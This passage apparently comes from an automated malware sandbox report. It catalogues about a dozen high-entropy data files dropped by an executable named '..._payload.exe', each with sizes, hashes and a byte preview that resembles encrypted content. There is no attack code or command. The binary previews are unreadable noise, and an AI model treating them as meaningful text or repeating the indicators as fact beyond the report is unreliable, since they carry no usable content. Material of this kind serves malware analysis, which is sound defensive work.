                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):969
                                                                                                Entropy (8bit):7.764635599742522
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:9WSb3met01o2i7w9wLqjIAINLvCxVzFcPsAswHH4QO85MdfzE84UeKoP7myiwq1l:jso2z9I2CLKXSEEP5ozBmj/rq1x3bD
                                                                                                MD5:39278742D088FEF0481E545CE5AF502E
                                                                                                SHA1:3D66B0DD5EFB3BFE83332F130FC04626A50155FE
                                                                                                SHA-256:C7C72F1AE8F71F769BF88DEFED9D35CC71E1BE62A85517F1E96004FF928A316E
                                                                                                SHA-512:D169523CD79162AD07A110ABBC4FC7A10325B8850127D90B6570A32D81E3355975523F4406B9367335780D4146B7B97E4FA85E012C0420A0E98E9FFCEBD8C77E
                                                                                                Malicious:false
                                                                                                Preview:<?xml.%^..&...X............'].[...T.:.BE.Pi;e...m..-.......3...4..Z9.$....V&...........;7y......>...k...5..../...g...WfF=.;"E.i.1....^.1.{....L-..C.c..=W.....o8.\.h.l.`....)+....A.......n`.J.do....z........O.o..2dK.3-.a^..Y..b..Q..d+.U......I.,......xY"."z..N.Zn.x.{.Q.m..5..,.X.R;{.&o^.8._.&..n:/..Ea:.R!.....?./<U..};I..-.......u..u...Ja..,4t..mf..c..Ue...`7%.V....L...v.........}.q,....GY.".6....p..0O......k...||.["....).'.t\.Uw.K..=J.@..8.*...B,....]...7N..?.G....o.V~.to%.c.(.|...t...Q....y.G..4{.q.Kd....e.....c.....Gi..JZ....K....2.....I..itW........QbUz....h......DO<..?d.E.\7...:Z.E.U.....Dw,......mB.s.7........N.y....<!..uW..r...[a..+....tf..e.H.Q.F[..nj.X/k..`.;.......7O.7&.6.......`..1..Uq8...kt...f8-a.%...e....*~:3C@.?......T3..ri......,M....H1o:e.Ub....Lk.|...... ..K.4e1T...j.9H...t.0.../.H....B'.U../m.~M.S;(..;......_......DJBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1467
                                                                                                Entropy (8bit):7.87372499712586
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:a1C57tpYUQTTZW9Hp4kIz2iISo4NadoaC+Ex3bD:auHQTTZW9HRjSt4doz+ALD
                                                                                                MD5:0AEE2E1C53236D2249608B2295152F9D
                                                                                                SHA1:85654896815FFE4DEFCD6228564309A9B5E1A885
                                                                                                SHA-256:AEA383D92CB7049F3C9A168884BD2C33B930FC1A4B16D48F5C8B0E55CBD61C9B
                                                                                                SHA-512:EC6292B8FCFDD9571F94EA5DC29F00DC06ECF9922604010ECA8A1FB5723816D0BBBA1F24E1981F6722AF13090389601AB8F31FDB0F6404D69FB371647AB4C342
                                                                                                Malicious:false
                                                                                                Preview:<?xml.zv9e.u.C.......n..............&&....n..4'..n....n....P;('.U..S.._......M..U.+u..n.urz6s.....[..F...9w....v..n..j.N.j.J}r...7.7u.[....R........<..d.3;/.).9Qg.TM. ...(.M T.......:..K-.t.i'%9I.ha}..m.....g.e..:ru.X.5...R.....P....H.2.@..$9"$..xp;tg<i.R......W}..(dY.^.p|.)c.. ...;.T.....H...'......q..Z...4,..DO....M.o@i.@VA o...1..b2.G.m........_....J..9.p......q"4(~.,P..................(...![u.8.7........XL.5..... )%..e..M.h2..D...<N..(.P..&..$....B.....v..(.V..m.yb.&..A....'9%..3.a........4..p2.{.W..7.:I..A........4u...rO+1.....p.G..L;.4;...7..cf(.{..W...I..U.Z<.0e...*...uheA......\....h.ofX.#gmF..m#.lo.y....EO........-..6.."<..R.....).&....e......C......p....u.....v..Yf.n6k.......\.\...{./..........C ...'G.n..T.-sQ9O.:.g.>].....,6....R.xh..Ti.F.!%.uiX...p.F....F.|......O.J...o..._?t..).+..7..I..b...h.....0..& N.@.-yPM(x\..8}.8...L...pZl...ERg....H].q..V.&......J.%$.5PC.....uF..;^V~.;m.\D...v.)A.....k..Z.............<.|.8..
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1397
                                                                                                Entropy (8bit):7.8536957839564705
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:SAPQnYKgx0ZjZNQoapst0lJ+D/6ZEoWkPB41MBx7nfE4+P1+Ehkp0+HT6SExIdJX:zQYKgx0LaOaj8iZnB0M7E4+P13JFSJLX
                                                                                                MD5:BD381F77D6A21DF1BC785E3285DD866B
                                                                                                SHA1:74A1BFA5F8C5BAAB054729863B552A2FF5C8A1F6
                                                                                                SHA-256:0C26DDD5B3DA147C6756A033436D9241ED3AE9166F7257FF28EB5BE615561B2D
                                                                                                SHA-512:E801A746E8C020D35CEDCFB22AEFB4AEDF52F418B545C655470D6D6F2F9AD79DEB8A620680F14DD2F01E8E475486FD97C69051F92877AAEAFC291EEDF87E7EC5
                                                                                                Malicious:false
                                                                                                Preview:<?xml....R...7..m..J...#D...../.[4..n......<9..}.."..fh...J.t.9.S....@wrV1.P....I u..{O..U...S|...<.Pu..X.g.R....gs1h.q.H./N.:..Y...........<*...x.m.*..!.A...7g.._.8.]"H!<t...~.C......Q...:.C*h8...z..}....Z.M...$..G....m.1.@.~.]..zF.Tl.F!j.y.<.#......9......B.u*})Av%.....*5..*]`j..E...I.S..e_.'...(..U....Hyj?.s2.zo.......&.B.I|..M..g3...Q..E.4E,=.t.s...|"..V.V.+>.....K.]re....GA.....`.':e....I.+.&{...2.xc.#.a}..m6.;s.....nT....f.E..'..c.9N.:@...%..@.L#....Y.Qr}tlT..._D.!1o.,a.Y..m.s..0..T....@.;`.Oq.....\...."~'.PT?...W.v.l..5......K.@..[...}B.B....Z.`...8..gW.Ue@...P..k.Z3....#}:k.w.5.....}....n...mAA...}......@w?....i.N.|v!.j.(.@......Q..._.J.9b.[...|z\{...3..XdS......Fa.ty...Q....c...W5u...;.....v\.K..c..........pf*..^...#.'...[Z8._...O.Z~g..+.......o....O<M......^..p...1Kv.\I.BT..M..,.&'..$%t.,.{[.6#....?.v.W...[.@m.6.o`..r...PK..0.yn^%.8..[..n`.WT.....{C....8:........g.......4d<..0..7.ULh{bC..w.Z..#r.,jXI..L;..m.h.....r..:3]Hl{.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1269
                                                                                                Entropy (8bit):7.801444666168979
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:GmLHGjcvA/WKScTN4JTE1AEC4TT5KN0T0GaJC10nJyj2zlhbiDJVd7i5x3bD:7LHGjcY/RTN4JEiExveVGaJCuoSzPbHr
                                                                                                MD5:9C7444AAB6D4A4CE0C4BB8D0C7FA314D
                                                                                                SHA1:39078229204FC5A821905759C353804A7263013E
                                                                                                SHA-256:C6D9CA93E28C1BB5594E1C3A8F259550709C3C986F4451880D03BE6AED0A69F8
                                                                                                SHA-512:BAD3FD69D0C4ACA7F4E3DC64C430A6218C1ED05E975E6DC3F1C1BB04072F8DD9F48EF4694BA0831FAC0411396AAE3AC70AFDF30139D4ACEF7504E8BB815C3C58
                                                                                                Malicious:false
                                                                                                Preview:<?xml#.m..ev..X......Rk.O......9.:..g.k.3@$.f.B...T$..`.dD....L...S".<.@T...|....^..H...*.......r..?.. ...%..F.'.&..}..........m.m.R.N..o.5...s...e.-......X.6..(..ns2...m....FF....p&Tn$....V.N...I|.L..2.a.......l.r..o@.;...g.oA....]..%U.)=j.H.Qo[...f^....N.K.l...e....h.>XP.OPC%.0.^.|..b..FA..A.....z.k0...t#(.(.^..UY...P...I...7F.v...V1L"....t;..w...B.kA..O.w...[.<..H-..Hil.m.p..^m.....c #. .#..LJ...g.g1.9..05...jr..v.>.*{D.!r.Lf7.....Y.%.D..h..>r>$.....d.. .^..P05&..=.;..K.....}....H9.r....aD......R....9.......t.....T......G#..L.E5!..G.g8.L...n...g..UCR'..E.nQ.....P...9s.#R.b?.!..<....f..|.m.9.....K.P.+*m.6../d#.o.....y..;.w.2a......2.^4..H ..^..C.v..8..9..Bhp.....[.{~.#..3..|6.ex.V]m..-0.......$?J.....-.9....k.&.r.v..CB...]..{...y.w..B4....}.-...... ....Z.>o.......e._O.g......PH;......L\W]...I@8i@v..+...._V9z.W..Z.. ....4].9.<...&.UY|k.h......a...u^.YiL......2.Z.."IF....0..s-.m..A.r.ceQa.qLQ...ld;E~.V4..A....b~-...V.SCe...E .>.`.z..P.Y.?$...
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1088
                                                                                                Entropy (8bit):7.81933314386282
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:hskMfqYzQ1IfCg9OENa8DYFSeppRMcDiEbXgdjX+Dabx3bD:hsvfq29ft9O6jDYFVRn5rgdjXfFLD
                                                                                                MD5:5E61820840A712E5CE5A03F0A2C1629E
                                                                                                SHA1:3DD4C1C7917D07C458DBE6ABB3880AE495BB6A38
                                                                                                SHA-256:4AF3D3ABBEBA719A4B099C9E5715639FD9052396D40E6771DA423EDA07E781CF
                                                                                                SHA-512:EF36303A15DE7EB04EA724DAE4D3CFD4E48D0382B7E929828C65F317537C581ACC919A0933515A7247DAB66CBE771864A153AC3372E33D87EC336C6049F49130
                                                                                                Malicious:false
                                                                                                Preview:<?xml...wk..~..Z.gtI.:J...ha.W....x.,(W......X......u....7..)l.L...L..L....z. ..9)....AN.H....).nS.....H$.N.n;.....CW...8.kt...._........<....`8.%.o..G.......a.h..:uY..6fB]..B...g.....swea.7x..~b.y.....*PJ.;.y.O..u...o......Np..!.rn..Ig.9..X.....b.CKX..."....D..J."..)........gC..t.....7,}|..F._n...;Go...Y..vh....tFw..ci^.....F.....Qf.J...i.....G|..n...'.u.J.J....N7.7...H.E.=..p)"=...A..J....=...C..#.....<v...{F.....%.9..G..y....'ki........$.....(A.S.Rin....TC.YU.D...Ja......r.{z.....,..e...7.A.C...u..PRj.v......s...mM..q..T..h.oL.....|e....W.N.....>.f...........AcN..k`q..T....J.W....t_@...hO<..yU.!....~Jf....a.j7;.?...,V..d.."...o"...{l...I.r`+3.9....c.`...CV[4(c...P.9.H..<..e+.....P$UE..0ki......2....*G.E.~f...].`..Zz.....%......p.o.-.[..J3.;C.jn.S.5.~.p.b..O%q..'9v~...*.LF]....bdv..rC.JcM..MG.#Z...K.)y.Ed.`*.s*.st......s..Y.:/....o.=..j...y.V....~..(ZM...a.8.m...w...L..B..M^.+.M...t*.-lf.ac.......F[D.../.w.v...Z{...x....E*.....37_.!.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1100
                                                                                                Entropy (8bit):7.798582497433982
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:x2xK5mCdleXllnW8aeRDv8ROlJA8YbV37pO6x3bD:CK5d+jTEROlJW37phLD
                                                                                                MD5:41D8A6A08D357CC3D658734DC1E511B3
                                                                                                SHA1:ADF43D549254A8F68C576BD0BA08EA7CED0D314A
                                                                                                SHA-256:1BC274F9C1E28342668A44639894E84EE9FD9D2F60E3C70CC50B5459142DF4EA
                                                                                                SHA-512:D8ACDB0760BE7F546A11DFB2185A050371A3F4FC292DE88B7D1D6029504A23ADB3B18ACAA126EAFDDE4F258960586184EF29648CE6C0A335CAAC4045AA76ED1A
                                                                                                Malicious:false
                                                                                                Preview:<?xml...5.3....>j.+7.p._g..........N...m.]..6..@.....Ma....x.l.L..0.!.;...-..}.q.*.L.......?.............}=._.\.&n...M.X.IQz.X}C.'.1V.k...8.W..=!u.............=..$..aR?.t...j....~..(I_.u.:..uS.A.....\y..;....j..U.S...l=...C.J.]..4.0O.....V..9.m.:,[.s.=._.Z|...l2..o...a.e>Z..7..~.."Y9..._-GS7..6.f...{..7k..;V...D...Au......N.....5.G..NG..........z.qZ..u.-|.+.........B.[.|Ua.......H?......:...[.S.%..d....gs..uvm.>dW4..OV.............s.bJ.A9.3...M....V......NJ[iT..r..,..Yq..ty..6....Qatu.|.O.v*...g.D..-;~`........Dz...~\"=.7{*.|..h..a.....[x..m.qr.... ...?$."_.c.....}..]....jL.01J....u..--..<...Qe.G5'.......~.0..s~.....I7..y.wS..U.....e...l.0....%.....@.i...Gm.i..8{.>.R3S.`.......i.tT.._e.:F.dY\V."..=..M.c........M.`...i...`...^PP......u).pkc.J..".a.....8.X.#.bm..2...F....w...!..g....G6.p..sD.x......Ir<dF..b.mD8...w...Q..i.....k.F=%.....d.....d.....b*.qMj..E.E)0>.."~)...9.....;..H.#.G.'..\.HB.S:b.7...o..x...?.`....C............E..ol~.f.....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1192
                                                                                                Entropy (8bit):7.838528522456994
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:oPRrINPzgLFiHo5KcRVwNFSip8rVOP098nee//+Ey/x3bD:oPhIdzgkoLeFSierVOPy8e4/Jy5LD
                                                                                                MD5:AAE98166462AB61C9452D88328DFECAC
                                                                                                SHA1:4926A2D14D57FA1D96F31A9F2B0354102569B1DB
                                                                                                SHA-256:A0FE2745E9A65CA4C803857040DA994681D85666BF05F6175E24DDFE791596E5
                                                                                                SHA-512:3935600B1C371944102FB45B176955154BA95EDC438279A1A82078D0347CAB66D464B2CA4E3952213A8E64C4ECA881C5782E71A010BFF2676BC6B8E13D853378
                                                                                                Malicious:false
                                                                                                Preview:<?xml....KM....K.3..f.Yr......>..'.D^d.b....a>..nu0.]/....j...c...>.Ll..V.W.....k.x.m.9.<...H..+.}c..i.....;...........g.9*..f.*..D.pn.@\...t.j\..........~.'.I?.SJ'..c.s.,.7.v...:.4...o.....v...~3..7W..*hD......%M.}.0..7....-..TG0...;.,.1...ff.uX..R`.Xg...`).........h.......|.Yr... R...g...fp...U....u..-..4....j..6..D.`#.XeGs.'...U2x..W...M..8=.D..6.S..M...Oh....MM.9"^.`..Yc^...{|.-0T....A.z..w.g...{:4...F%.........r.$.."........t....x...a..!t......8Gl..L._;.S...:V....]x ...d$.....4....e].*..?.2...L.KW.k...M........(.....NmI....E.".....I[c.xx.x?g.X_[m..<d..ym@.........n...>.%.qs(n.`o..~...S.0..}2....~......Z`E\....LP....F.+(.xbq).PC..s)..gW.<.b.u..?T.B2.......g.....*.&.MI.......%J.wL.?.NP.s%{.{...\...}T8..*sQ....Q...\1.I...*_.....=...^`c.,;.X).. OB;..+........./.4.=..TwP!)Y`o7CX6.k.:... ...p..(.s.....@.Cv..b.......n..5.G.._k<p.K..m..o2]yp...........~ok..K..........$.{l..*.3.?.Q..={9.JNg.B.c....d.dv..Q.@...'H.V[N}xo..&..H.!.o.
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1031
                                                                                                Entropy (8bit):7.790594115425689
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Kf6QgoxMqahdh3EKoY7UgNmWSSAihh3393FbnmVv6x3bD:s6Qgjdh3+gNmWSSACxt1bmVGLD
                                                                                                MD5:F02943AC2DCF5D545779F6A75446B8FB
                                                                                                SHA1:B2E587C1BFA350BFF6FC4A178E2F655118E285DA
                                                                                                SHA-256:C90F7E535A3BBCF00030DACCE1CD505DF74D51A62D48304F9BD112E60F570918
                                                                                                SHA-512:B6792167DD8E5E0E9A2DA1CB02598E9408DA60F20E4D89C802AE622FFA737DEB6855EB6CE4FA82B507AD2B8E57C090EB14B5878335878D416F7A5050C262C494
                                                                                                Malicious:false
                                                                                                Preview:<?xml...L.A..N...:9.u#.......|..u|...F...kU=.m.e9y9..=....d.9w.TbeT.....,..........RWo.h.x........5._.5u+t...\..7..A.Gq... iBo...#.B..1.!)..H....~2vS..y...r...~P$...D9.O^j= .U...t...|.....<.......E&Jo.q$.HIF.......z....?.~......1b!...F..+yG.].H..o..z...36..-.{...._...V2...._.-8..2ve,8o..+~Z...@C..K6....O..@\x........!.JJ...$>[0.<....5.....:.....[3.._@.U..X.N|+*...Gx...1h..o.=..m.4.cwE.a..{0..22I>...|...k.y.%.....-.C.OO..=R#...E@.G]h9z6u..1.5.......#.]........b..+t..6..X..fg6...M.w._.0gMf....s.H#X}1......x....<.Y....'._q..c................D...#J..+k.d..j.....4.,.i...>o;..>O&.N.1x.....R..5}...w..I$.....G...k..(.=....6~.e'_..A"......D._.RE.0.W|.^j.T6..c_".GH}..../l`.....m...;..ZD..!....&`>.[.3.{...3..~7]..=%.9.o`l..*Bc.Ep......y.......PU%...~j...O..$.....R$2.c)W....o..|8y.MJ.l.?...d_E.~X..g.Qc.m{.+.Y.+...P.C.w....e.TR....x...i...L...9.../.....I.aj..u.By./.m.^......!F.....9...)n..4.. ^H..BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3884
                                                                                                Entropy (8bit):7.954236827193198
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:Xy4SQji0pfZDgzGzvmurdvd3BbRLoQ000KfNgaTy8TXBz7jbVr:Xy4bjzpBEQj1XpTzBuONjB
                                                                                                MD5:8C4C3C78A165DBD9B432C2863F772569
                                                                                                SHA1:1308E2EFF6998574F13464A09205BECD7D378714
                                                                                                SHA-256:A2FDFECA81005E04C1913CC52BBDF885B44C9383925E47C1E309A1034FE56AF9
                                                                                                SHA-512:914DA9F3DD1D407BD372F32FA9DAAEA74979828C79FD2146377060FB9329F15647B84B61D63F71B51ED481FACBA6600B9796084DD29F7AE38CFD91BD6F500CB9
                                                                                                Malicious:false
                                                                                                Preview:<?xml/.{=.....L.......E1.D1.$..%{.=..!'...E.fW.l......H%.N.Q5...F..@.-X.~....,...#..A=..]%[.wdk...$4..;.J.:g..y....M..7=..~.B...J..g;o.u..?.x.'....~...c...T.Y..n.....!o... .......Ar C5.Cc..v.pP..x.D"..\.$...i...v...0......q.&.o.A+7......P.N6....G...b.b..w".o.....S.A...%...dG..<....Z..J..'.c..|A..PK.U....|}2-....I...e#.UH^.3_OP.L?...y....M.+....9...j.z{.3B....L{&.I.....7e.y..../y).. .(...F........sCj.....)..............s.tx..w.~..+....t...6.Q.:.......Jr,...: .......K......N.x>..^.T.iK.#j..fO.....h.#U.@....e0...#Q.Q\.x...E.}.J.|..=...U.`......l.8.Z.....X.,.A....%..c....Y.t."..ND...a:.k\4..D..A?...>...k+..).N.T.lD7.Z.....@m.E..A.<F*.........s.o.P)}...F..Z,O%QCJ$.............j.~?;..............,.I .+w..6.vT4.u.A..'..b.../.........V#..(....z.X.{k....4K$b......d{.<....58.K....H.;.n..I.......<]......}2.h.".D.J`..}H.%Z...;..q..u..b...Q.o.T8q.a.$....>...TF.D.pb......1)...5.PH..H......Ej...\..S.{..?.`...C...........&...S..3x.4..[..L.9E.@....X|[!
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):790
                                                                                                Entropy (8bit):7.678030239421893
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:KBRljcxi34N4wmXCP+yVEQlqmkq4VGBYRFyKVElKsMI2+5w1mfBKtESmjzM1AgJ4:MRczmLyVPZkLRF06+5LfItnm3Mqx3bD
                                                                                                MD5:655A447FCE8935F6881484E133F30926
                                                                                                SHA1:E4C20AE3CA8B8908061ABF74563E278583B17C20
                                                                                                SHA-256:54B41E0D3BA479FDA5C61A1D7531975812CBD815F8DAF8422EDF539BB41B8202
                                                                                                SHA-512:975260FFE53AE429FC4ECF01B60C83E926B73988E59DD957BFE5A40682C7E1EA881DDD00A00F702C1872873CE696EB11F94E1F9065B13A9950C6D4FA68325A27
                                                                                                Malicious:false
                                                                                                Preview:<?xml..W......<.9... .5.khC.....3y.*...A..s..'..99H..#{0.L^m..^:..&..Q.r7.5......g.Y.L3....+;.rW....7..@..t....LR..a.cz..E..bl.C.u.....l......t8...YS..1[R....8......b..$.j.....rV..m$X!#.8.....r..3...../...7..e...z....w..0.....N..vk.9.%.+..H..^.|..b..Y...........0u.}.3...7.o%..,.~p...?.....Yt.....\.5..-vBuK...8n.t]...V.s|Si/.U..u...QJ.U.}..lp...'......?.?.N.tq..k[A#....`./.(.~..B..H..hCb..c#\B....KL.;....Q>y\.8.H.8b..q`i=QR3.L+K.A.~.PK...q.%..T...B.J....Z...).V....2...._.*X.|..c......lS......Z.. ..O...."+.....(..h.C...1.x.=z3.l.s?[..*..|...9.R`..\...`....#.SB.?.. ..9..6J..Z...h.b.b.+..mu=.".M.#.e.....f...Q..S6|[....m:..X..r2.%@.Qi}..p..E.}F1Sm......+.%bv. ....s....)[.._BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):3934
                                                                                                Entropy (8bit):7.948014087240487
                                                                                                Encrypted:false
                                                                                                SSDEEP:96:hZNmEeDnHZkBiaPpprqz/5W2dfoyHwYNA0BSP4rWTsQwQ/Ra9:wEEHZUhk/BloyQYNA0Bk4S4QXZ+
                                                                                                MD5:F3A4650464F54A9ECC50AC143D94D799
                                                                                                SHA1:47F096C1B97787C5572047FC5C5795043C2D5DB2
                                                                                                SHA-256:A200AFAFC5521F4AB1DA8E0E4F505737E0A4666BD9D09CFE8F4DA91AFA53E6CB
                                                                                                SHA-512:017BC457E1F89BE78BCFD44A2A6E99DCD1EE3200CD34356EBDA8AE572891FD1F59411C6D12045D640A8167D019E1D245289E0543DFDEAD1065495B77119477D3
                                                                                                Malicious:false
                                                                                                Preview:<?xml......v.]....@k.m6.f3.O.&.......:.;...$H.o..91....i6.f.bq#...%>w............V.b... .T.8.?.xs...z....Jo....b...R...x"...b....4pF.u....4uv...R...Fp.....K#...m........6.8L..a..;[.1.k.b....~Lb .5..."...]....L0...?.473".>.}..1.......?..E..g.6.4..p0.?.:.f.......uo..=..-.b....(`......kV..Y.......lu..Ux!..D....Z'...T =..n..a....I.0.%..gV.=.f..Z...78b.:..e'......@..0..0.q.%r.r.F;..YuX+[.qJ...........R.H..`...Jf+r.C..&.q..5..f..B.~..].v.6........Ec.C..A{y..#QO.s.:!.,....f.............J...Ug5#....gPe.LZ.P-Q.n...&.t..C.O..rvC.g).(.F}.d...,..|.......V..'..4......o.....R.$...'N....X.T..8..f'$.^8.@`.EF..u...X...b.E..B-.q.Nag...!.v........(2E..z.._..u...wE....N......OyQ).#..Bm...tn|.F.;..P.....&...HY./R..C....g....;.L...f..!Fe...Sib.....U..B.c-8.]Z8fj*.....X...DV...?..<..wG...>V?..7.T.T&..qOt......5..$.. .....34...Dyc..`.H.aJ../_......BfR6....w.{t[...{.Zs.ah.5S.&E.{L....k.7>N.g.Z....#..oA~...@.......... )..i..H....?V....V..".+Ry=
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1148
                                                                                                Entropy (8bit):7.800050835414957
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:Vx4qHslp49NUl5yK0SrbiQXyX8aTZM0EYkwlT5BQMrH1x3bD:VCqHHGbt592jF4YkmT5BQUfLD
                                                                                                MD5:C099922192EB5A2EA649AA8F43DE743F
                                                                                                SHA1:9D987472BB3E7A1FCE6617977A3F746677CF959C
                                                                                                SHA-256:2D7837A5776482C2C8AB6ABB0A745A78C09FB9F3D1EA73970EFE4A18550FD3BE
                                                                                                SHA-512:063B467E66EF173C039B83AE4B699462E28EF5E0748AF0519B279714CC97A0F83E93C98F606F06AA027BAA1C091AD5B55ADC2A930F7C4A8A4D21D0A4F5F413E6
                                                                                                Malicious:false
                                                                                                Preview:<?xml...`.N..-.cx.u..._/.h.....4n..^uzcY_...t.?.I.&;l.c$.ik1.:Gv.p.q...of.....=4.._.....z.Z.@.t-....[.....:<...D.&...Jh..W..%...8.C9a.{Q.s.G.....u...c.m.....6GjO...*87a...........S.[.[%..A?w...L/..).....u.d.yY....1.....Bp..C..M_..../.#.....`..B7. .(<.R...'..0...$.r.<-..1.'..]Q...@.....v.'p.........c..'.o....$.m...S....<.L..K.....V...m.}....t/.@..=.....H#l..R.d{_..+...-p.NS..0.C...D......]`..o&........L.../^@..[......t....x..$..`.i.Km....J(I...sW...B.K..D.._7...M.3.F....C._g...-K.".:.....k....U...Ba.Q.IH?Mz...S ..(._.p/..[....UA..nY...J'......S."..7A.7.......4...y.9..|...{.I.li:IZ.HZ.0..=.(j`0.w..G.....T."..C..lvO.$.s...)...a.....p*.H%0..Z.d..:.%..1.K.,.=......u'Ti2ai...Aqa&G....DO...K.|..t#".z..R...zWx.z.D(M..QT.D.V.e....;...<...)~..z.+.=.HfK.6C...`..0.|0.....K..l......k.}........c....H&I../.QE.....O.[I.%.Z44}...&..8..]..Q..(..g.T.9...Q5` ..|.7.1...N..M....(.M.ZL7..1'.]...e.@.?.q<......|.y.....+Ac.~h.....I!...[aF.u...h...!..2..r..."V.......F....
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1782
                                                                                                Entropy (8bit):7.879185603558696
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:KuTRU00tVwQWobe41DbuctJD3/PudhGn7a6LD:Kuy06xx2cttPah47aa
                                                                                                MD5:74C1EBE81C9A509E05DD8984703AD2D3
                                                                                                SHA1:55D2A6F7A3AB29A487FCB50AF597C5FDC4D145FF
                                                                                                SHA-256:D1D0D504C666ACFE7BF18F4ADF5743159DAC1C52B16A605457C7BD8F98F398CA
                                                                                                SHA-512:14AC78C722D784AFCDF0856B531109B4C9FF09E3BCC263CA55D9C05EAADA37DA5B7AFA0B9132E66663BD52D29C20C79B0EA521FC6C63C3393BC0D5A8351DF161
                                                                                                Malicious:false
                                                                                                Preview:<?xml.{6...M.$......O.c.|....I.bv.Lr..5x.^.I..o.c..XO.S......J..R...E.2...b,.(.SM..G....V....0........6.....^c{m.X.49....6.......:.J.Y....>.g..`.a.......@g-.r....:q....V.v..~.*#Q..KI..v.O.J*q.M>?..*...&..&....D.....9....U;.................Q;.}..H$.m...&.....J[=+.mxCKd..{H.k..`z.e...G.....8....yWG......6..}..\U..^....h.....?....E....(......T.#."EW.Y..6......U..M..^/.tML...84.:........i.m.....o.+..^`....~.5F.!...EPN..6.......&!..A...&.....p.y...k..Kj..S.Q/..L..V.../..;..!.C..R]..T.:-.R.M..8......ZK..N....Y..=U.3.>r\.y....8.....b......E..W...A.aK...o40'..-...0C.(l.{..k.......w<K....w.....8...6.n......#..3.}....*..W.;Y.lm.>..AD.nr..HLr...euQ.q.=..%K.D.QF..U..R[C....G.......I..H.....G.'.$.y..o.y.P..>;2l."....-5...].b..........;..(~.&_%.'.6{..?.>. m.....b%/klWa......6+....?.[....,].V.._.%..d..|56..(!..Ex...F...4..f/.~.|........^~........G@=..8....n...a.......I.L]...6.:.z...^n;.u..*j$....A.......#..(.*.W..:]Q....D].....H9^f.... v.r..k........
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):791
                                                                                                Entropy (8bit):7.68042320878849
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:vBR9UvgCZU5mLvkMy0P1YsF9IvF3OMKhFjhXYmp4sMxMA75SaJgJc3cii9a:vBQFZbbxFuvF3yjzt2MGJx3bD
                                                                                                MD5:6240F1A22B741D1C3DA2EBFE881F1B89
                                                                                                SHA1:9606362AE6915E9947C4C7B1197B5ADDFA64C130
                                                                                                SHA-256:EA501BBDC8487D12EA6BE748147A405633A4255CCFDC6B42DCF75555CC5EB83E
                                                                                                SHA-512:C8A9C080A0A1A669D5EA0DF24F5362B947071C84FDF5849007B968E88FDBE6ACD9ED773B392F3B003E78900EC39EC7B0EAF4892A558F095EA34DFFC359194149
                                                                                                Malicious:false
